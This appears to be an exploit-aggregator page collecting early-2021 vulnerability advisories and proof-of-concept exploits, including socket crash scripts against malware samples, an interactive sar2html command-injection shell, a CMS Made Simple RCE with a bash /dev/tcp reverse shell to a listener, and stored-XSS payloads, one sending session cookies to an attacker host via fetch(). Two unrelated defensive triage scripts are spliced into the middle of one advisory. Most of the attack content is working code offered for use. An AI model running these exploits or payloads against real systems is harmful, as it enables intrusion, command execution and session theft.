Channel: Exploit Collector

HEUR.RISKTOOL.WIN32.BITMINER.GEN Remote Memory Corruption / Null Pointer


HEUR.RISKTOOL.WIN32.BITMINER.GEN malware suffers from a null pointer vulnerability.


MD5 | 601917f8df7d6350a3eb11666ce5459c

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: http://malvuln.com/advisory/b85ae73dbbfff1d3b90cb7c78356f2a3.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: HEUR.RISKTOOL.WIN32.BITMINER.GEN
Vulnerability: Remote Memory Corruption
Description: Null pointer write access violation on server response to an HTTP request to TCP port 8046. The program also connects to port 80 and respawns upon crashing.


Type: PE32
MD5: b85ae73dbbfff1d3b90cb7c78356f2a3
Vuln ID: MVID-2021-0009
Dropped files: SQLAGENTSI.exe, AutoRunApp.vbs, VBS.vbs
ASLR: False
Safe SEH: True
Disclosure: 01/02/2021

Memory Dump:
0:012> .ecxr
eax=0e4e3beb ebx=05d8b4c0 ecx=74d07084 edx=04370850 esi=05db2b00 edi=05d8b028
eip=05d8b4c2 esp=05c3ff0c ebp=05c3ff3c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
05d8b4c2 0000 add byte ptr [eax],al ds:002b:0e4e3beb=??

ExceptionAddress: 05d8b4c2
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 0e4e3beb
Attempt to write to address 0e4e3beb

0:012> !address 0e4e3beb
Usage: Free
Base Address: 0a860000
End Address: 5a2c0000
Region Size: 4fa60000
Type: 00000000
State: 00010000 MEM_FREE
Protect: 00000001 PAGE_NOACCESS


The specimen also throws an exploitable guard page violation: a page of memory that marks the end of a data structure, such as a stack or an array, has been accessed.

ExceptionAddress: 2a8dd862
ExceptionCode: 80000001 (Guard page violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 33036b23

0:012> .ecxr
eax=33036b23 ebx=2a8dd860 ecx=74d07084 edx=044c0850 esi=2a921548 edi=2a8ddf60
eip=2a8dd862 esp=05c0ff0c ebp=05c0ff3c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
2a8dd862 0000 add byte ptr [eax],al ds:002b:33036b23=??


Exploit/PoC:
import socket

port=8046
payload="A"*256
max_flood=666
c=0

def doit():
    global c,payload,port
    s = socket.socket()
    try:
        host = ''
        s.bind((host, port))
        s.listen(5)

        print('HEUR.RiskTool.Win32.BitMiner.gen / Remote Memory Corruption')
        print('MD5: b85ae73dbbfff1d3b90cb7c78356f2a3')
        print("By malvuln")

        while c < max_flood:
            c+=1
            conn, addr = s.accept()
            conn.send(payload+'\r\n')
            conn.close()
            if c==max_flood:
                break
    except Exception as e:
        pass


if __name__=="__main__":
    doit()


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).


TROJAN.WIN32.JORIK.DMSPAMMER.SZ Remote Memory Corruption


TROJAN.WIN32.JORIK.DMSPAMMER.SZ malware suffers from a remote memory corruption vulnerability.


MD5 | 55fd186c4f2c6e538578030ac38957e3

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: http://malvuln.com/advisory/bdcaed5042eba30f91b093f0bcb3caf3.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: TROJAN.WIN32.JORIK.DMSPAMMER.SZ
Vulnerability: Remote Memory Corruption
Description: Memory corruption in the server-response handling when the malware makes an HTTP POST request for a PHP file named "stat1.php" on TCP port 80.

Type: PE32
MD5: bdcaed5042eba30f91b093f0bcb3caf3
Vuln ID: MVID-2021-0008
Dropped files: svcnost.exe
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 1/2/2021

Memory Dump:
(1dc4.14dc): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=ffffefff edx=00000000 esi=00000003 edi=00000003
eip=773ced3c esp=0acbf444 ebp=0acbf5d4 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
ntdll!ZwWaitForMultipleObjects+0xc:
773ced3c c21400 ret 14h

0:003> .exr -1
ExceptionAddress: 03b2657b
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 0ada1000
Attempt to read from address 0ada1000

0:003> .ecxr
eax=e5cb4ea8 ebx=00000002 ecx=ffffefff edx=00000000 esi=0ada1000 edi=0adc2390
eip=03b2657b esp=0acbfd84 ebp=0acbfdc4 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
03b2657b f3a4 rep movs byte ptr es:[edi],byte ptr [esi]

0:003> dd 0adc0008
0adc0008 41414141 41414141 41414141 41414141
0adc0018 41414141 41414141 41414141 41414141
0adc0028 41414141 41414141 41414141 41414141
0adc0038 41414141 41414141 41414141 41414141


Exploit/PoC:
import socket

port=80
payload="A"*4000

def doit():
    global payload
    s = socket.socket()
    try:
        host = ''
        s.bind((host, port))
        s.listen(5)

        print('TROJAN.WIN32.JORIK.DMSPAMMER.SZ / Remote Memory Corruption')
        print('MD5: bdcaed5042eba30f91b093f0bcb3caf3')
        print("By malvuln")

        while True:
            conn, addr = s.accept()
            conn.send(payload+'\r\n')
            conn.close()
    except Exception as e:
        pass

if __name__=="__main__":
    doit()



SQLMAP - Automatic SQL Injection Tool 1.5


sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.


MD5 | c07963ad8b64601adc6f1793b84d5786


Phorpiex Insecure Permissions / Privilege Escalation


Phorpiex malware suffers from an insecure permissions vulnerability that can allow for privilege escalation.


MD5 | 78184adcea32cef38b4e72376069905a

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: http://malvuln.com/advisory/f4d7d721f68bc9a80aaf53bc184a3c58.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Phorpiex
Vulnerability: Insecure permissions EoP
Description: Change (C) permission is granted to Authenticated Users on the directory housing the malware.

Type: PE32
MD5: f4d7d721f68bc9a80aaf53bc184a3c58
Vuln ID: MVID-2021-0007
Dropped files: svchost.exe
Disclosure: 01/02/2021

Exploit/PoC:
c:\>cacls C:\11973197639004\svchost.exe
C:\11973197639004\svchost.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C



BACKDOOR.WIN32.BNLITE Remote Heap Corruption


BACKDOOR.WIN32.BNLITE malware suffers from a remote heap corruption vulnerability.


MD5 | 1350fe87125f382e8b464f50e1026574

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: http://malvuln.com/advisory/f78cef7588f9c32609a4932d10c67f95.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: BACKDOOR.WIN32.BNLITE
Vulnerability: Remote Heap Corruption
Description: When a specially crafted payload is sent to TCP port 5000, the backdoor malware suffers a heap corruption.

Type: PE32
MD5: f78cef7588f9c32609a4932d10c67f95
Vuln ID: MVID-2021-0012
Dropped files: NBLF32.exe
ASLR: False
Safe SEH: True
Disclosure: 01/02/2021

Memory Dump:
PROCESS_NAME: NBLF32.exe
FAULTING_MODULE: 77360000 ntdll
DEBUG_FLR_IMAGE_TIMESTAMP: 0
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 30322326
READ_ADDRESS: 30322326

FOLLOWUP_IP:
ntdll!RtlAllocateHeap+19ba
773a2d6a 8b09 mov ecx,dword ptr [ecx]

FAULTING_THREAD: 00000b84
DEFAULT_BUCKET_ID: HEAP_CORRUPTION
PRIMARY_PROBLEM_CLASS: HEAP_CORRUPTION
BUGCHECK_STR: APPLICATION_FAULT_HEAP_CORRUPTION_STRING_DEREFERENCE_INVALID_POINTER_READ_WRONG_SYMBOLS
LAST_CONTROL_TRANSFER: from 773a16b7 to 773a2d6a

0:000> .ecxr
eax=0000263b ebx=026fa980 ecx=30322326 edx=3b333532 esi=026fa988 edi=026d0000
eip=773a2d6a esp=0019fcf0 ebp=0019feb0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
ntdll!RtlAllocateHeap+0x19ba:
773a2d6a 8b09 mov ecx,dword ptr [ecx] ds:002b:30322326=????????


Exploit/PoC:
from socket import *
#NBLF32.exe HEAP CORRUPTION
#May need to send payload twice consecutively
#or wait for reboot if exploit fails first time.
#===============================================
MALWARE_INFECTED_HOST="x.x.x.x"

s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_INFECTED_HOST, 5000))

PAYLOAD="DELETE / HTTP/1.0 KýΛ@g5”ö?KýΛ@g5”ö?"*44220

s.send(PAYLOAD)
s.close()

print("Backdoor.Win32.BNLite Malware / Remote Heap Corruption")
print("MD5: f78cef7588f9c32609a4932d10c67f95")
print("By malvuln")



Backdoor.Win32.Zombam.k Stack Buffer Overflow


Backdoor.Win32.Zombam.k malware suffers from a remote string dereference stack buffer overflow vulnerability.


MD5 | 05421fbc3ad7da507f99f68ed1a1e1a0

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/79d9908b6769e64f922e74a090f5ceeb.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Zombam.k
Vulnerability: Remote String Dereference Stack Buffer Overflow

Description: HTTP RAT 0.21 Backdoor Webserver by z0mbie creates on-the-fly executable backdoors that listen on ports you specify. The main executable then emits a binary named "httpserver.exe" listening on the port specified in the backdoor creation steps. Sadly, the backdoor is vulnerable to a stack buffer overflow when a large HTTP GET request of roughly 1000 bytes is sent to the listening backdoor port.


Type: PE32
MD5: 79d9908b6769e64f922e74a090f5ceeb
Vuln ID: MVID-2021-0015
Dropped files: httpserver.exe

ASLR: False
DEP: False
Safe SEH: True
Disclosure: 1/4/2021

Memory Dump:
EAX : 0574FA40
EBX : 03FE02A0
ECX : 00000415 L'Е'
EDX : 41414141
EBP : 0574FA28
ESP : 0574F9F0
ESI : 03FE02A0
EDI : 00405076 httpserver.00405076
EIP : 00402906 httpserver.00402906


(12f4.e58): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=0494fa20 edx=41414141 esi=00000003 edi=00000003
eip=773ced3c esp=0494f0bc ebp=0494f24c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
773ced3c c21400 ret 14h


0:004> .ecxr
eax=0494f9f0 ebx=04020300 ecx=0494fa20 edx=41414141 esi=04020300 edi=00405076
eip=0040292e esp=0494f9d8 ebp=0494fa28 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
*** WARNING: Unable to verify checksum for httpserver.exe
*** ERROR: Module load completed but symbols could not be loaded for httpserver.exe
httpserver+0x292e:
0040292e 8b4204 mov eax,dword ptr [edx+4] ds:002b:41414145=????????

FAULTING_IP:
httpserver+292e
0040292e 8b4204 mov eax,dword ptr [edx+4]

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0040292e (httpserver+0x0000292e)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 41414145
Attempt to read from address 41414145

PROCESS_NAME: httpserver.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000000

EXCEPTION_PARAMETER2: 41414145

READ_ADDRESS: 41414145

FOLLOWUP_IP:
httpserver+292e
0040292e 8b4204 mov eax,dword ptr [edx+4]

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 00000e58

BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER: from 004024ce to 0040292e

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0494fa28 004024ce 41414141 0494fa40 00000415 httpserver+0x292e
0494faa4 41414141 41414141 41414141 41414141 httpserver+0x24ce
0494faa8 41414141 41414141 41414141 41414141 0x41414141
0494faac 41414141 41414141 41414141 41414141 0x41414141
0494fab0 41414141 41414141 41414141 41414141 0x41414141
0494fab4 41414141 41414141 41414141 41414141 0x41414141
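The exception records in this advisory (and the malvuln dumps earlier on this page) follow a fixed WinDbg layout, which makes first-pass triage easy to automate. The script below is an added example and is not part of the advisory or of malvuln's tooling: it parses the ExceptionCode and Parameter[...] fields of a constructed .exr record shaped like the one above, maps Parameter[0] to read/write/execute, and flags a fault address derived from a repeated fill byte such as 0x41, which is the sign that request data reached the dereferenced pointer. The sample record and the fill-byte list are constructed for the example.

```python
import re

# Constructed sample in the shape of the WinDbg exception record in this advisory.
SAMPLE_EXR = """\
ExceptionAddress: 0040292e (httpserver+0x0000292e)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 41414145
"""

# Parameter[0] of an access violation encodes the faulting operation.
ACCESS_KIND = {0: "read", 1: "write", 8: "execute"}
# Byte values commonly used as junk fill in crash reproductions (constructed list).
FILL_BYTES = {0x41, 0x42, 0x43, 0x44}

FIELD_RE = re.compile(r"\s*(\w+)(?:\[(\d+)\])?:\s*([0-9a-fA-F]+)")


def parse_exr(text):
    """Parse the numeric fields of a WinDbg .exr record into a dict."""
    rec = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, idx, val = m.groups()
        if idx is None:
            rec[key] = int(val, 16)
        else:
            rec.setdefault(key, {})[int(idx)] = int(val, 16)
    return rec


def from_fill_pattern(addr, width=4, slack=16):
    """True if addr, or an address up to `slack` bytes below it, is a repeated fill byte.

    The slack covers faults like 41414145, which is the fill value plus a field offset.
    """
    for delta in range(slack + 1):
        a = addr - delta
        if a < 0:
            break
        bs = a.to_bytes(width, "little")
        if len(set(bs)) == 1 and bs[0] in FILL_BYTES:
            return True
    return False


def triage(text):
    """Summarise an exception record: what faulted, where, and whether fill data reached it."""
    rec = parse_exr(text)
    code = rec.get("ExceptionCode")
    params = rec.get("Parameter", {})
    summary = {"code": code, "pc": rec.get("ExceptionAddress"),
               "kind": None, "fault_addr": None, "fill_pattern": False}
    if code == 0xC0000005 and len(params) >= 2:
        summary["kind"] = ACCESS_KIND.get(params[0], "unknown")
        summary["fault_addr"] = params[1]
        summary["fill_pattern"] = from_fill_pattern(params[1])
    elif code == 0x80000001:
        summary["kind"] = "guard page"
        summary["fault_addr"] = params.get(1)
    return summary


if __name__ == "__main__":
    s = triage(SAMPLE_EXR)
    print("pc=%08x %s at %08x, fill-pattern=%s"
          % (s["pc"], s["kind"], s["fault_addr"], s["fill_pattern"]))
```

A read fault on a fill-pattern address, as here, points at a corrupted pointer rather than a simple return-address overwrite; a write fault (Parameter[0] = 1) on an arbitrary address, as in the BitMiner record above, is the more directly dangerous primitive and deserves priority in triage.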


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=80

s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))

JUNK="A"*2000
PAYLOAD="GET /"+JUNK+" HTTP/1.0\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
s.send(PAYLOAD)
s.close()
print("Remote Buffer Overflow")
print("MD5: 79d9908b6769e64f922e74a090f5ceeb")
print("By Malvuln")




sar2html 3.2.1 Remote Code Execution


sar2html version 3.2.1 remote code execution exploit. Original discovery for this vector of attack is attributed to Furkan Kayapinar in August of 2019.


MD5 | bc607c1eddfe53e9df710be0c5a8bb3d

# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1

#!/usr/bin/env python3

import requests
import re
from cmd import Cmd

url = input("Enter The url => ")

class Terminal(Cmd):
    prompt = "Command => "
    def default(self, args):
        exploiter(args)

def exploiter(cmd):
    global url
    sess = requests.session()
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
    out = []  # stays empty if the response could not be parsed
    try:
        out = re.findall("<option value=(.*?)>", output.text)
    except Exception:
        print("Error!!")
    for ouut in out:
        if "There is no defined host..." not in ouut:
            if "null selected" not in ouut:
                if "selected" not in ouut:
                    print(ouut)
    print()

if __name__ == "__main__":
    terminal = Terminal()
    terminal.cmdloop()


CMS Made Simple 2.2.15 Remote Command Execution


CMS Made Simple version 2.2.15 suffers from an authenticated remote command execution vulnerability.


MD5 | 492dc0161e142e4c459b5c1f250a6bb0

# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
# Author: Andrey Stoykov
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
# Version: 2.2.15
# Tested on: Debian 10 LAMPP
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/12/cms-made-simple-2215-authenticated-rce.html

The vulnerability is in "editusertag.php" at line #93, where user input is passed to the PHP eval() function.

// Vulnerable eval() code

if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {

Reproduction Steps:

1. Login as administrator user and navigate to Extensions->User Defined Tags

2. Add code with the payload of:
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'");

3. Click on the newly created User Defined Tag and use the Run function

RCE will be achieved:

astoykov@Lubuntu:~$ nc -kvlp 4444
nc: getnameinfo: Temporary failure in name resolution
Connection received on 192.168.56.132 53690
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)


Subrion CMS 4.2.1 Cross Site Scripting


Subrion CMS version 4.2.1 suffers from a cross site scripting vulnerability. Original discovery of cross site scripting in this version is attributed to Ismail Tasdelen in July of 2018.


MD5 | 1253f50cff931b9d19f0285fa4985b32

# Exploit Title: Subrion CMS 4.2.1 - 'avatar[path]' XSS
# Date: 2020-12-15
# Exploit Author: icekam
# Vendor Homepage: https://subrion.org/ <https://www.icekam.com/>
# Software Link: https://github.com/intelliants/subrion
# Version: Subrion CMS 4.2.1
# CVE : CVE-2020-35437

Stored XSS vulnerability in /_core/profile/.
Reproduce through the avatar[path] parameter in a POST to the /_core/profile/ URL.
payload:"><sCrIpT>alert(1)</sCrIpT>

https://github.com/intelliants/subrion/issues/880


Incom CMS 2.0 File Upload


Incom CMS version 2.0 suffers from an unauthenticated arbitrary file upload vulnerability.


MD5 | e37477593ca5df2723fa00d2390b8cfa

# Exploit Title:  IncomCMS 2.0 - Insecure File Upload
# Google Dork: intext:"Incom CMS 2.0"
# Date: 07.12.2020
# Exploit Author: MoeAlBarbari
# Vendor Homepage: https://www.incomcms.com/
# Version: 2.0
# Tested on: BackBox linux
# CVE: CVE-2020-29597

<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
    <p>Upload your file</p>
    <input type="file" name="Filedata"><br />
    <input type="submit" value="Upload">
  </form>
</body>
</html>


House Rental And Property Listing 1.0 Cross Site Scripting


House Rental and Property Listing version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.


MD5 | a6e015b7f0196d673377897e7e405d0e

# Exploit Title: House Rental and Property Listing 1.0 - Multiple Stored XSS
# Tested on: Windows 10
# Exploit Author: Mohamed habib Smidi (Craniums)
# Date: 2020-12-28
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14649/house-rental-and-property-listing-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14649&title=House+Rental+and+Property+Listing+in+PHP+with+Full+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application

Step 1: Create a new user then login
Step 2: Click on "Register" page to register a room.
Step 3: Input "<script>alert("Full name")</script>" in every field, using each field's own name in the alert, except phone number and alternate number.
Note: for the email address you can inspect elements and change the type from email to text.
Step 4: Once all fields are completed, Click on Submit
Step 5: From the home page click on Details/Update, This will trigger all Stored XSS payloads one after the other.



Intel Matrix Storage Event Monitor 8.0.0.1039 Unquoted Service Path


Intel Matrix Storage Event Monitor x86 version 8.0.0.1039 suffers from an IAANTMON unquoted service path vulnerability.


MD5 | d63cbd50d7684008b682c1026d6a9f5d

# Exploit Title: Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path
# Date: 2021-01-04
# Exploit Author: Geovanni Ruiz
# Vendor Homepage: https://www.intel.com
# Software Version: 8.0.0.1039
# File Version: 8.0.0.1039
# Tested on: Microsoft® Windows Vista Business 6.0.6001 Service Pack 1 x64es

# 1. To find the unquoted service path vulnerability

C:\>wmic service where 'name like "%IAANTMON%"' get name, displayname, pathname, startmode, startname

DisplayName                            Name      PathName                                                                StartMode  StartName
Intel(R) Matrix Storage Event Monitor  IAANTMON  C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe  Auto       LocalSystem

# 2. To check service info:

C:\>sc qc "IAANTMON"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: IAANTMON
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Intel(R) Matrix Storage Event Monitor
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

# 3. Exploit:

To exploit this vulnerability an attacker needs to drop a malicious executable into the service path, undetected by the OS, in order to gain SYSTEM privileges.
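Checking for this class of misconfiguration across a fleet is easier with a script than by reading wmic output by hand. The following Python is an added example, not from the advisory author: it parses constructed text in the shape of `wmic service get name,pathname` output (the IAANTMON line mirrors the advisory; the other two services are made-up controls), flags services whose unquoted path contains spaces, lists the directories whose ACLs must then be verified not to grant write access to non-administrators, and produces the quoted PathName that fixes the finding.

```python
import ntpath
import re

# Constructed sample in the shape of `wmic service get name,pathname` output.
# IAANTMON mirrors the advisory; Spooler and Good are made-up controls.
SAMPLE_WMIC = """\
Name      PathName
IAANTMON  C:\\Program Files (x86)\\Intel\\Intel Matrix Storage Manager\\IAANTMon.exe
Spooler   C:\\Windows\\System32\\spoolsv.exe
Good      "C:\\Program Files\\Vendor\\agent.exe" --service
"""


def executable_part(pathname):
    """Return the executable portion of a service PathName (up to the first .exe)."""
    p = pathname.strip()
    m = re.match(r"(.*?\.exe)", p, re.IGNORECASE)
    return m.group(1) if m else p


def is_unquoted_with_spaces(pathname):
    """True when the image path is unquoted and contains a space: the SCM will
    try each space-delimited prefix as an executable before the real one."""
    p = pathname.strip()
    if p.startswith('"'):
        return False
    return " " in executable_part(p)


def dirs_to_review(pathname):
    """Directories in which an earlier-matching executable could be placed.

    Each prefix ending at a space is a candidate image; its parent directory is
    where the defender must confirm that non-administrators cannot write."""
    exe = executable_part(pathname)
    dirs = set()
    for i, ch in enumerate(exe):
        if ch == " ":
            dirs.add(ntpath.dirname(exe[:i]))
    return sorted(dirs)


def quoted_fix(pathname):
    """The PathName as it should be registered: executable quoted, arguments kept."""
    p = pathname.strip()
    exe = executable_part(p)
    return '"%s"%s' % (exe, p[len(exe):])


def audit_wmic(text):
    """Parse wmic-style output and return one finding per vulnerable service."""
    findings = []
    for line in text.splitlines()[1:]:        # skip the column header
        m = re.match(r"(\S+)\s+(.*)", line)
        if not m:
            continue
        name, pathname = m.groups()
        if is_unquoted_with_spaces(pathname):
            findings.append({
                "service": name,
                "pathname": pathname,
                "review_dirs": dirs_to_review(pathname),
                "fix": quoted_fix(pathname),
            })
    return findings


if __name__ == "__main__":
    for f in audit_wmic(SAMPLE_WMIC):
        print("%s: unquoted path with spaces" % f["service"])
        print("  check write ACLs on: %s" % ", ".join(f["review_dirs"]))
        print("  fix with: sc config %s binPath= %s" % (f["service"], f["fix"]))
```

On a real host the input would come from `wmic service get name,pathname` or `Get-CimInstance Win32_Service`; the review list for IAANTMON is C:\ and C:\Program Files (x86)\Intel, which by default are not writable by standard users, so the finding is only exploitable where those ACLs have been loosened.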


Click2Magic 1.1.5 Cross Site Scripting


Click2Magic version 1.1.5 suffers from a persistent cross site scripting vulnerability.


MD5 | 8231a89187eac44b59af565d60b51794

# Exploit Title: Click2Magic 1.1.5 - Stored Cross-Site Scripting
# Exploit Author: Shivam Verma(cyb3r_n3rd)
# Date: 2020-12-25
# Google Dork: N/A
# Vendor Homepage: https://www.click2magic.com/user/agent/index
# Software Link: https://www.click2magic.com
# Version: 1.1.5
# Category: Web Application
# Tested on: Kali Linux

Attack Vector: an attacker can inject a malicious payload into the chat section; each time an admin or user visits and manages the user data, the XSS payload triggers and the attacker can capture the admin's cookies and access user data.

Step 1. Visit the link.
Step 2. Start a new chat.
Step 3. When asked for a name, paste your XSS payload.
Step 4. Wait for the administrator to click on your link.
Step 5. You will receive the admin cookie every time they process the request.

---

XSS Payload: "><script src=https://.xss.ht></script>



EgavilanMedia User Registration And Login System With Admin Panel 1.0 XSS


EgavilanMedia User Registration and Login System with Admin Panel version 1.0 suffers from multiple persistent cross site scripting vulnerabilities. Original discovery of persistent cross site scripting in this version is attributed to Soushikta Chowdhury in December of 2020.


MD5 | c0088fd63210a6f4ebeb65d5f533a11d

# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting
# Date: 30-12-2020
# Exploit Author: Mesut Cetin
# Vendor Homepage: http://egavilanmedia.com
# Version: 1.0
# Tested on Windows 10, Firefox 83.0, Burp Suite Professional v1.7.34

Vulnerable parameter: email, gender, username
Payload: <script>alert(document.cookie)</script>

Proof of Concept:

To bypass client-side filter, we will use Burp Suite. Reproduce the vulnerability by following the steps:

1. Login with default credentials "admin:password" at the demo page at: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
2. Click above right on the "Profile" tab
3. Navigate to the "Edit Profile" tab
4. In Firefox, use Foxyproxy and click on "Intercept" within Burp Suite. Press on "Update password" button at demo page.
5. Capture the POST request in Burp Suite and manipulate the parameter as shown:

POST /User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile_action.php HTTP/1.1
Host: demo.egavilanmedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 180
Origin: http://demo.egavilanmedia.com
Connection: close
Referer: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile.php
Cookie: PHPSESSID=944b2es2eb67f971af305b2105e35c3e

fullname=admin&username=<script>alert(document.cookie)</script>&email=<script>alert('PoC 2')</script>&gender==<script>alert('PoC 3')</script>&action=update_admin

6. Forward the request and refresh the page. You'll receive three different XSS pop-ups. One of them contains the PHPSESSID cookie. By using payloads like <BODY ONLOAD=fetch(`http://attackers-page.com/${document.cookie}`)>, the session cookies can be sent to the attacker.


CSZ CMS 1.2.9 Cross Site Scripting


CSZ CMS version 1.2.9 suffers from multiple cross site scripting vulnerabilities.


MD5 | 1ed4df9d15c3b3ca05832e0d79200b0a

# Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
# Date: 2020/12/28
# Exploit Author: SunCSR
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.2.9
# Tested on: CSZ CMS 1.2.9

1. Reflected XSS
Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc

